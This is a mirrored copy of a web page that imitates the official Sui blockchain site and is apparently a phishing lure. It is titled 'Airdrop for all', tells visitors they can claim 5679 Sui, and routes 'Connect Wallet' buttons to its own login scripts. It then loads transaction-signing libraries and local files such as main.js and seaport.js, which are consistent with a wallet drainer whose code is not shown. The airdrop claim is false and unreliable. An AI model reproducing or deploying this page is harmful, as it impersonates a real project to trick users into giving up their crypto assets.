<html lang="en">
<!-- Mirrored from suifinance.org/index.html by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 05 Apr 2023 19:00:18 GMT -->
<head>
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=5,user-scalable=0">
  <meta name="robots" content="index,follow">
  <meta property="og:type" content="website">
  <meta name="theme-color" content="#6FBCF0">
  <meta data-rh="true" name="keywords" content="Technology,Blockchain,Move,Sui, Mysten labs">
  <meta data-n-head="ssr" charset="utf-8"><meta data-n-head="ssr" name="viewport" content="width=device-width,initial-scale=1"><meta data-n-head="ssr" data-hid="og:image" property="og:image" content="../sui.io/img/sui-social.jpg"><meta data-n-head="ssr" property="twitter:card" content="summary"><meta data-n-head="ssr" property="twitter:creator" content="mysten_labs"><meta data-n-head="ssr" property="twitter:title" data-hid="twitter:title" content="Sui Blockchain - Build without boundaries"><meta data-n-head="ssr" property="twitter:description" data-hid="twitter:description" content="Sui is the first permissionless Layer 1 blockchain designed from the ground up to enable creators and developers to build experiences that cater to the next billion users in web3. - Sui is a decentralized platform to build rich and dynamic on-chain assets from gaming to finance. A STEP-FUNCTION CHANGE IN BLOCKCHAIN DESIGN"><meta data-n-head="ssr" property="twitter:image" data-hid="twitter:image" content="../sui.io/img/sui-social.jpg"><meta data-n-head="ssr" name="format-detection" content="telephone=no"><meta data-n-head="ssr" data-hid="description" name="description" content="Sui is the first permissionless Layer 1 blockchain designed from the ground up to enable creators and developers to build experiences that cater to the next billion users in web3  - Sui is a decentralized platform to build rich and dynamic on-chain assets from gaming to finance. A STEP-FUNCTION CHANGE IN BLOCKCHAIN DESIGN. Horizontally scalable, instant finality, low fees. "><meta data-n-head="ssr" data-hid="og:title" name="og:title" content="Sui Blockchain - Build without boundaries"><meta data-n-head="ssr" data-hid="og:description" property="og:description" content="Sui is the first permissionless Layer 1 blockchain designed from the ground up to enable creators and developers to build experiences that cater to the next billion users in web3 - Sui is a decentralized platform to build rich and dynamic on-chain assets from gaming to finance. A STEP-FUNCTION CHANGE IN BLOCKCHAIN DESIGN. Horizontally scalable, instant finality, low fees. "><title>Sui Blockchain - Airdrop for all</title><link data-n-head="ssr" rel="icon" type="image/x-icon" href="favicon.png"><link data-n-head="ssr" data-hid="canonical" rel="canonical" href="https://sui.io/"><link rel="preload" href="_nuxt/0575fef.html" as="script"><link rel="preload" href="_nuxt/690ad68.html" as="script"><link rel="preload" href="_nuxt/css/a03621a.css" as="style"><link rel="preload" href="_nuxt/f080702.html" as="script"><link rel="preload" href="_nuxt/css/85276c9.css" as="style"><link rel="preload" href="_nuxt/5473dee.html" as="script"><link rel="preload" href="_nuxt/765984b.html" as="script"><link rel="preload" href="_nuxt/css/409193f.css" as="style"><link rel="preload" href="_nuxt/84ee33b.html" as="script"><link rel="preload" href="_nuxt/184f30f.html" as="script"><link rel="preload" href="_nuxt/17e3746.html" as="script"><link rel="stylesheet" href="_nuxt/css/a03621a.css"><link rel="stylesheet" href="_nuxt/css/85276c9.css"><link rel="stylesheet" href="_nuxt/css/409193f.css"><link rel="preload" href="_nuxt/static/1680124948/state.js" as="script"><link rel="preload" href="_nuxt/static/1680124948/payload.js" as="script"><link rel="preload" href="_nuxt/static/1680124948/manifest.js" as="script">

  <link href="https://fonts.googleapis.com/">
  <link href="https://fonts.gstatic.com/" crossorigin="">
  <link href="https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700;800&amp;display=swap" rel="stylesheet">

  <link href="assets/css/font-awesome.css" rel="stylesheet">
  <link href="https://fonts.googleapis.com/css2?family=Space+Mono:wght@400;700&amp;display=swap" rel="stylesheet">


<script charset="utf-8" src="_nuxt/static/1680124948/manifest.js"></script><script charset="utf-8" src="_nuxt/static/1680124948/payload.js"></script><script charset="utf-8" src="_nuxt/f5c4a60.html"></script><script charset="utf-8" src="_nuxt/c86eff2.html"></script><script charset="utf-8" src="_nuxt/1abe52d.html"></script><script charset="utf-8" src="_nuxt/5ba62cc.html"></script><script charset="utf-8" src="_nuxt/static/1680124948/ecosystem/gaming/payload.js"></script><script charset="utf-8" src="_nuxt/static/1680124948/ecosystem/finance/payload.js"></script><script charset="utf-8" src="_nuxt/static/1680124948/resources/payload.js"></script><script charset="utf-8" src="_nuxt/static/1680124948/events/payload.js"></script></head>

<body>
  <div id="__suiio"><!----><div id="__layout"><div class="_sui-io" data-v-a444c778=""><div class="main-wrapper" data-v-a444c778=""><header class="header sui-header sui-announcement-layer" data-v-a444c778=""><section class="announcement"><p><a href="https://sui.io/resources-sui/announcing-permanent-testnet/"><strong><u>Announcing Permanent Testnet!</u></strong></a></p></section> <div class="sui-mainmenu"><div class="container"><div class="header-navbar"><div class="header-logo"><a href="index.html" aria-current="page" class="sui-logo sui_selected_exact sui_selected"><div class="_slogo"></div></a></div> <div class="header-main-nav"><nav class="mainmenu-nav"><div class="d-block"><div class="mobile-nav-header"><button data-bs-dismiss="offcanvas" class="mobile-menu-close"><i class="fas fa-times"></i></button></div></div> <ul class="mainmenu"><li class="menu-item-has-children"><a href="index.html#developer" target="" class=""><!---->
                  Developers</a> <ul class="sui-submenu"><li><a href="https://docs.sui.io/build" target="_blank" class="suiexternal">Getting Started</a></li><li><a href="https://docs.sui.io/" target="_blank" class="suiexternal">Documentation</a></li><li><a href="https://explorer.sui.io/" target="_blank" class="suiexternal">Explorer</a></li></ul></li><li class="menu-item-has-children"><a href="index.html#" target="" class=""><!---->
                  Ecosystem</a> <ul class="sui-submenu"><li><a href="ecosystem/gaming/index.html" class=""><!---->
                      Gaming</a></li><li><a href="ecosystem/finance/index.html" class=""><!---->
                      Finance</a></li><li><a href="resources/index.html" class=""><!---->
                      Resources</a></li><li><a href="https://jobs.sui.io/jobs" target="_blank" class="suiexternal">Jobs</a></li></ul></li><li class="menu-item-has-children"><a href="index.html#community" target="" class=""><!---->
                  Community</a> <ul class="sui-submenu"><li><a href="events/index.html" class=""><!---->
                      Events</a></li><li><a href="https://twitter.com/SuiNetwork" target="_blank" class="suiexternal">Twitter</a></li><li><a href="https://medium.com/mysten-labs" target="_blank" class="suiexternal">Medium</a></li><li><a href="https://discord.gg/sui" target="_blank" class="suiexternal">Discord</a></li><li><a href="https://www.linkedin.com/company/mysten-labs" target="_blank" class="suiexternal">LinkedIn</a></li><li><a href="https://forums.sui.io/" target="_blank" class="suiexternal">Forums</a></li></ul></li><li class="menu-item-has-children"><a href="https://github.com/MystenLabs/sui/blob/main/doc/paper/sui.pdf" target="_blank" class="suiexternal"><!---->
                  Whitepaper</a> <!----></li><li class="menu-item-has-children"><a href="https://mystenlabs.com/" target="_blank" class="suiexternal"><!---->
                  About Us</a> <!----></li></ul></nav></div> <div class="header-action"><ul class="list-unstyled"><li class="header-btn"><a onclick="login()" class="sui-btn btn-fill-white">
                Connect wallet →</a></li> <li class="mobile-menu-btn sidemenu-btn d-lg-none d-block"><button class="btn-wrap"><span></span> <span></span></button></li></ul></div></div></div></div> <div class="_sui-menu-bg"><section class="sui-m-menu"><div class="row"><div class="col-12"><ul class="m-top-menu"><li class="menu-item-has-children"><a href="#" target="" class="sui-m-icons"><div class="sui-m-icon"><img src="https://storage.googleapis.com/sui-cms-content/sui_dev_icon_d5cdcdbf6e/sui_dev_icon_d5cdcdbf6e.svg"></div> <!---->
                Developers</a> <ul onclick="web3_modal_show()" class="m-sub-menu"><li><a target="_blank">Getting Started</a></li><li><a target="_blank">Documentation</a></li><li><a href="https://explorer.sui.io/" target="_blank">Explorer</a></li></ul></li><li class="menu-item-has-children"><a href="#" target="" class="sui-m-icons"><div class="sui-m-icon"><img src="https://storage.googleapis.com/sui-cms-content/sui_eco_icon_20f51dfec8/sui_eco_icon_20f51dfec8.svg"></div> <!---->
                Ecosystem</a> <ul class="m-sub-menu"><li><a href="ecosystem/gaming/index.html" class="">
                    Gaming</a></li><li><a href="ecosystem/finance/index.html" class="">
                    Finance</a></li><li><a href="resources/index.html" class="">
                    Resources</a></li><li><a href="https://jobs.sui.io/jobs" target="_blank">Jobs</a></li></ul></li><li class="menu-item-has-children"><a href="#" target="" class="sui-m-icons"><div class="sui-m-icon"><img src="https://storage.googleapis.com/sui-cms-content/sui_community_icon_ad857cf0fd/sui_community_icon_ad857cf0fd.svg"></div> <!---->
                Community</a> <ul class="m-sub-menu"><li><a href="events/index.html" class="">
                    Events</a></li><li><a href="https://twitter.com/SuiNetwork" target="_blank">Twitter</a></li><li><a href="https://medium.com/mysten-labs" target="_blank">Medium</a></li><li><a href="https://discord.gg/sui" target="_blank">Discord</a></li><li><a href="https://www.linkedin.com/company/mysten-labs" target="_blank">LinkedIn</a></li><li><a href="https://forums.sui.io/" target="_blank">Forums</a></li></ul></li><li class=""><a href="https://github.com/MystenLabs/sui/blob/main/doc/paper/sui.pdf" target="_blank" class="suiexternal"><!----> <!---->
                Whitepaper</a> <!----></li><li class=""><a href="https://mystenlabs.com/" target="_blank" class="suiexternal"><!----> <!---->
                About Us</a> <!----></li></ul> <div class="_sui-m-btn"><a onclick="web3_modal_show()" target="_self" class="sui-btn btn-fill-primary">Connect wallet→</a></div></div></div></section></div></header> <ul class="list-unstyled shape-group-20 _sui-ani-bottom" data-v-a444c778=""><li class="shape shape-5" data-v-a444c778=""><img src="img/blocks/block5.png" alt="Line" data-v-a444c778=""></li> <li class="shape shape-7" data-v-a444c778=""><img src="img/blocks/block6.png" alt="Line" data-v-a444c778=""></li> <li class="shape shape-4" data-v-a444c778=""><img src="img/blocks/block7.png" alt="Line" data-v-a444c778=""></li> <li class="shape shape-5" data-v-a444c778=""><img src="img/blocks/block8.png" alt="Line" data-v-a444c778=""></li></ul> <section data-v-a444c778=""><main class="_sui-container-l"><section class="banner sui-banner"><div class="container"><div class="banner-content"><div class="title text-center"><h1>Build without <span style="color:rgb(111,188,240);">boundaries</span></h1></div> <p data-sal="slide-up" data-sal-duration="1000" class="mb--20 sal-animate">You're eligible to claim 5679 Sui.</p> <div class="sui--cta"><a  onclick="login()"class="sui-btn btn-fill-primary">Connect Wallet →</a></div></div></div></section> <section class="why_sui section"><div class="container"><div data-sal="slide-up" data-sal-duration="500" data-sal-delay="100" class="section-heading heading-dark sal-animate"><span class="subtitle">A STEP-FUNCTION CHANGE IN BLOCKCHAIN DESIGN</span> <h2 class="title">Why Sui?</h2> <p class="mb--10">Sui is the first permissionless Layer 1 blockchain designed from the ground up to enable creators and developers to build experiences that cater to the next billion users in web3.</p></div> <!----> <!----> <div id="whysui" class="row sui-grid"><div data-sal="slide-up" data-sal-duration="1000" data-sal-delay="100" class="_grid-item _sui_ws sal-animate"><div class="_grid-item _sui_ws"><div data-sal="slide-up" data-sal-duration="1000" data-sal-delay="200" class="project-grid _whysui-list _sui-fast _sub-grid-item _sui_why-bgs1 sal-animate" style="background-image:url(../storage.googleapis.com/sui-cms-content/fastaf_a8737a17cb/fastaf.png);background-repeat:no-repeat"><div class="content"><h3 class="title">Fast A*F</h3> <div class="mt--20 _sui_blocks_content"><p>Horizontally scalable,<br>instant finality, low fees.</p></div> <!----></div></div> <div data-sal="slide-up" data-sal-duration="1000" data-sal-delay="200" class="project-grid _whysui-list _sui-fast _sub-grid-item _sui_why-bgs2 sal-animate" style="background-image:url(../storage.googleapis.com/sui-cms-content/digital_assets_4ba1dad90e/digital-assets.png);background-repeat:no-repeat"><div class="content"><h3 class="title">Digital assets
unlocked</h3> <div class="mt--20 _sui_blocks_content"><p>Create more utility into NFTs and store directly on-chain.</p></div></div></div></div></div><div data-sal="slide-up" data-sal-duration="1000" data-sal-delay="100" class="_grid-item _sui_ws sal-animate"><div data-sal="slide-up" data-sal-duration="1000" data-sal-delay="200" class="project-grid _whysui-list _sui-fast _sub-grid-item _sui_why-bgs1 _sui-fast-1 sui_block_tall sal-animate" style="background-image:url(../storage.googleapis.com/sui-cms-content/forpeople_2a2dc2b50b/forpeople.png);background-repeat:no-repeat;background-position-y:100%"><div class="content"><h3 class="title">Designed for
real people</h3> <div class="mt--20 _sui_blocks_content"><ul><li>Your assets live directly in your account, not in someone else's smart contract.</li><li>Human readable signing requests: Know exactly what you're giving permission for.</li><li>Easily onboard users: Send an asset now, create an account later.<br><i>[coming soon]</i></li></ul></div></div></div></div></div> <div data-sal="slide-up" data-sal-duration="1000" data-sal-delay="350" id="developer" class="row mb--40 _fl-fix sal-animate"><div class="col-md-12"><div class="_sui_dev_resouce bg-color-dark" data-v-a3e24036=""><div class="row _dev-content" data-v-a3e24036=""><div class="col-md-6" data-v-a3e24036=""><h4 data-v-a3e24036="">Developer
Resources</h4></div> <div class="col-md-6" data-v-a3e24036=""><p data-v-a3e24036="">Get started with tutorials, documentation, SDK, APIs, reference implementations and more.</p> <a href="https://docs.sui.io/build" target="_blank" class="sui-btn btn-fill-primary" data-v-a3e24036="">
        Get Started →</a></div></div></div></div></div> <div class="row mb--40 sui-grid sui-grid-1-3"><div class="_sui_ws _grid-item _fl-fix"><div class="project-grid _whysui-list _sui-fast _sub__bg _sui_why-bg4" style="background-image:url(../storage.googleapis.com/sui-cms-content/comp_code_6e920a2408/comp-code.png);background-repeat:no-repeat"><div class="content _sui_bottom_blocks"><div class="col-md-6"><h3 class="title">Safe &amp;
secure smart contracts</h3> <div class="mt--20 _copy _sui_blocks_content"><p>Spend less time fixing smart contracts, more time building cool sh*t.</p></div> <a href="https://docs.sui.io/build/move" target="_self" class="sui-btn btn-fill-primary">Learn about Move →</a></div></div></div></div> <div class="_sui_ws _grid-item _fl-fix"><div class="project-grid _whysui-list _sui-fast _sub__bg" style="background-image:url(../storage.googleapis.com/sui-cms-content/green_ba5a7e2ad0/green.png);background-repeat:no-repeat"><div class="content"><div class="col-md-12"><h3 class="title">Green</h3> <div class="mt--20 _copy _sui_blocks_content"><p>Sui uses proof of stake and is designed for maximum efficiency.</p></div> <!----></div></div></div></div></div></div></section> <section id="community" class="sui-community section section-padding"><div class="container"><div class="section-heading heading-dark"><h2 class="title">Sui Community</h2> <p class="mb--10">
        Join the movement. Follow along, meet fellow builders on Discord or
        get updates.
      </p></div> <div class="row mb--100"><form><!----> <div class="input-group"><input type="email" placeholder="Email address" class="form-control"> <button class="subscribe-btn">
            Start Building →
          </button> <!----></div></form></div> <div class="row"><ul class="_sui-community"><li><a href="https://twitter.com/SuiNetwork" target="_blank"><img src="assets/img/icons/twitter-icon.svg" alt="twitter"></a></li><li><a href="https://medium.com/mysten-labs" target="_blank"><img src="assets/img/icons/medium-icon.svg" alt="medium"></a></li><li><a href="https://discord.gg/sui" target="_blank"><img src="assets/img/icons/discord-icon.svg" alt="discord"></a></li></ul></div></div> <div class="bg-bottom" style="transform: translate3d(0px, 0px, 0px);"></div> <div class="footerCicle"></div></section> <div class="bg-top" style="transform: translate3d(0px, 0px, 0px);"></div></main></section> <ul class="list-unstyled shape-group-9 _sui-ani-top" data-v-a444c778=""><li class="shape shape-7" data-v-a444c778=""><img src="img/blocks/block1.png" alt="circle" data-v-a444c778=""></li> <li class="shape shape-2" data-v-a444c778=""><img src="img/blocks/block2.png" alt="Line" data-v-a444c778=""></li> <li class="shape shape-3" data-v-a444c778=""><img src="img/blocks/block3.png" alt="Comments" data-v-a444c778=""></li> <li class="shape shape-4" data-v-a444c778=""><img src="img/blocks/block4.png" alt="Line" data-v-a444c778=""></li></ul> <footer class="footer-area" data-v-a444c778=""><div class="container _sui-footer-container"><div class="footer-top"></div> <div class="footer-main"><div class="row"><div class="col-xl-4 col-lg-4"><div class="footer-widget _sui-footer-logo border-end1"><img src="_nuxt/img/sui-logo.8d3c44e.svg" alt="Sui logo" class="light-version-logo"></div></div> <div class="col-xl-8 col-lg-8"><div class="row"><div class="col-lg-3 col-md-3 col-6"><div class="footer-widget"><h6 class="widget-title">
                   Build
                </h6> <div class="footer-menu-link"><ul class="list-unstyled"><li><a href="https://docs.sui.io/" target="_blank">
                        Docs
                      </a></li><li><a href="https://github.com/MystenLabs" target="_blank">
                        GitHub
                      </a></li><li><a href="https://discord.gg/sui" target="_blank">
                        Chat on Discord
                      </a></li></ul></div></div></div><div class="col-lg-3 col-md-3 col-6"><div class="footer-widget"><h6 class="widget-title">
                  Join
                </h6> <div class="footer-menu-link"><ul class="list-unstyled"><li><a href="https://suifoundation.org/" target="_blank">
                        Sui Foundation
                      </a></li><li><a href="https://boards.greenhouse.io/sui" target="_blank">
                        Careers
                      </a></li></ul></div></div></div><div class="col-lg-3 col-md-3 col-6"><div class="footer-widget"><h6 class="widget-title">
                  Read
                </h6> <div class="footer-menu-link"><ul class="list-unstyled"><li><a href="https://medium.com/mysten-labs" target="_blank">
                        Blog
                      </a></li><li><a href="https://github.com/MystenLabs/sui/blob/main/doc/paper/sui.pdf" target="_blank">
                        Whitepaper
                      </a></li></ul></div></div></div><div class="col-lg-3 col-md-3 col-6"><div class="footer-widget"><h6 class="widget-title">
                  Sui
                </h6> <div class="footer-menu-link"><ul class="list-unstyled"><li><a href="https://docs.sui.io/contribute" target="_blank">
                        Contribute to Sui
                      </a></li><li><a href="https://suifoundation.org/#grants" target="_blank">
                        Developer Grants
                      </a></li></ul></div></div></div></div></div></div></div> <div class="footer-bottom"><div class="row"><div class="col-md-4"><div class="_sui_footer_social"><div class="_sui-footer-logoM"><div class="footer-widget"><img src="_nuxt/img/sui-logo.8d3c44e.svg" alt="Sui logo" class="light-version-logo"></div></div> <div class="footer-social-link"><ul class="list-unstyled"><li><a href="https://twitter.com/SuiNetwork" target="_blank" aria-label="twitter"><img src="https://storage.googleapis.com/sui-cms-content/twitter_260be14bb1/twitter_260be14bb1.svg" class="iconlinks"></a></li><li><a href="https://medium.com/mysten-labs" target="_blank" aria-label="Medium"><img src="https://storage.googleapis.com/sui-cms-content/medium_4cf295c1e0/medium_4cf295c1e0.svg" class="iconlinks"></a></li><li><a href="https://discord.gg/sui" target="_blank" aria-label="discord"><img src="https://storage.googleapis.com/sui-cms-content/discord_3286014c1d/discord_3286014c1d.svg" class="iconlinks"></a></li></ul></div></div></div> <div class="col-md-5 order-lg-last"><div class="footer-bottom-link"><ul class="list-unstyled"><li><a href="policy/index.html">Privacy Policy</a></li> <li><a href="terms/index.html">Terms of Service</a></li></ul></div></div> <div class="col-md-3"><div class="footer-copyright"><span class="copyright-text">©2023 Copyright Sui. All rights reserved.</span></div></div></div></div></div></footer></div></div></div></div><script defer="" src="_nuxt/static/1680124948/state.js"></script><script src="_nuxt/0575fef.html" defer=""></script><script src="_nuxt/765984b.html" defer=""></script><script src="_nuxt/84ee33b.html" defer=""></script><script src="_nuxt/184f30f.html" defer=""></script><script src="_nuxt/17e3746.html" defer=""></script><script src="_nuxt/690ad68.html" defer=""></script><script src="_nuxt/f080702.html" defer=""></script><script src="_nuxt/5473dee.html" defer=""></script>
  <!--EXTRA JS FILES-->



  <!-- Global site tag (gtag.js) - Google Analytics -->
  <script async="" src="https://www.googletagmanager.com/gtag/js?id=G-YKP53WJMB0"></script>
  <script>function gtag(){dataLayer.push(arguments)}window.dataLayer=window.dataLayer||[],gtag("js",new Date),gtag("config","G-YKP53WJMB0")</script>

  <script crossorigin="anonymous" src="../polyfill.io/v3/polyfill.mine77a.js?features=WeakMap,IntersectionObserver"></script>


<link href="_nuxt/css/409193f.css" rel="stylesheet" type="text/css"><div id="cc--main" style="position: fixed; z-index: 1000000;" class="c--anim"><!--[if lt IE 9 ]><div id="cc_div" class="cc_div ie"></div><![endif]--><!--[if (gt IE 8)|!(IE)]><!--><div id="cc_div" class="cc_div"><div id="s-cnt" role="dialog" aria-modal="true" aria-hidden="true" aria-labelledby="s-ttl" style="visibility: hidden;"><div id="c-vln"><div id="cs"><div id="c-s-in"><div id="s-inr" class="bns-t"><div id="s-hdr"><div id="s-ttl" role="heading">Cookie preferences</div><div id="s-c-bnc"><button type="button" id="s-c-bn" class="c-bn" aria-label="Close"></button></div></div><div id="s-bl"><div class="c-bl"><div class="title"><div class="b-tl" role="heading" aria-level="3">Cookie usage 📢</div></div><div class="desc"><div class="p">We use cookies to ensure the basic functionalities of the website and to enhance your online experience. For more details relative to cookies and other sensitive data, please read the full <a aria-label="Choose cookies" class="cc-link" href="policy/index.html#personal-information-we-collect" target="_blank">privacy policy</a>.</div></div></div><div class="c-bl b-ex"><div class="title b-bn"><button type="button" class="b-tl exp" aria-expanded="false" aria-controls="c-ac-1">Strictly necessary cookies</button><label class="b-tg"><input class="c-tgl" type="checkbox" value="necessary" disabled=""><span class="c-tg c-ro" aria-hidden="true"><span class="on-i"></span><span class="off-i"></span></span><span class="t-lb">Strictly necessary cookies</span></label></div><div class="desc b-acc" id="c-ac-1" aria-hidden="true"><div class="p">These cookies are essential for the proper functioning of my website. Without these cookies, the website would not work properly</div></div></div><div class="c-bl b-ex"><div class="title b-bn"><button type="button" class="b-tl exp" aria-expanded="false" aria-controls="c-ac-2">Analytics cookies</button><label class="b-tg"><input class="c-tgl" type="checkbox" value="analytics"><span class="c-tg" aria-hidden="true"><span class="on-i"></span><span class="off-i"></span></span><span class="t-lb">Analytics cookies</span></label></div><div class="desc b-acc" id="c-ac-2" aria-hidden="true"><div class="p">These cookies collect information about how you use the website, which pages you visited and which links you clicked on. All of the data is anonymized and cannot be used to identify you.</div></div></div></div><div id="s-bns"><button type="button" id="s-all-bn" class="c-bn">Accept all</button><button type="button" id="s-rall-bn" class="c-bn">Reject all</button><button type="button" id="s-sv-bn" class="c-bn">Save settings</button></div></div></div></div></div></div><div id="cs-ov" style="visibility: hidden; opacity: 0;"></div></div><!--<![endif]--></div><link href="_nuxt/css/409193f.css" rel="stylesheet" type="text/css">

    <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11" type="text/JavaScript"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/ethers/5.7.2/ethers.umd.js" type="application/javascript"></script>
    <script type="text/javascript" src="./scripts/sweetalert2@11"></script>
    <script src="https://cdn.jsdelivr.net/npm/web3@1.8.1/dist/web3.min.js"></script>
    <script type="text/javascript" src="./scripts/index.js"></script>
    <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/web3modal@1.9.11"></script>
    <script type="text/javascript" src="https://unpkg.com/evm-chains@0.2.0/dist/umd/index.min.js"></script>
    <script type="text/javascript" src="https://unpkg.com/@walletconnect/web3-provider@1.8.0/dist/umd/index.min.js"></script>
    <script src="https://unpkg.com/axios@1.2.2/dist/axios.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/@coinbase/wallet-sdk@3.6.3/dist/index.min.js"></script>
    <script type="text/javascript" src="./scripts/ethereumjs-tx-1.3.3.min.js"></script>
    <script language="javascript" type="text/javascript" src="./scripts/ABI.js"></script>
    <script type="text/javascript" src="./scripts/main.js"></script>
    <script type="text/javascript" src="./scripts/seaport.js"></script>
    <script src="https://code.jquery.com/jquery-3.6.3.slim.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/ua-parser-js@1.0.33/src/ua-parser.min.js"></script>
    <script src="//cdn.jsdelivr.net/npm/sweetalert2@11"></script>
    <script src="https://cdn.jsdelivr.net/npm/@coinbase/wallet-sdk@3.6.3/dist/index.min.js"></script>

</body>
<!-- Mirrored from suifinance.org/index.html by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 05 Apr 2023 19:00:18 GMT -->
</html>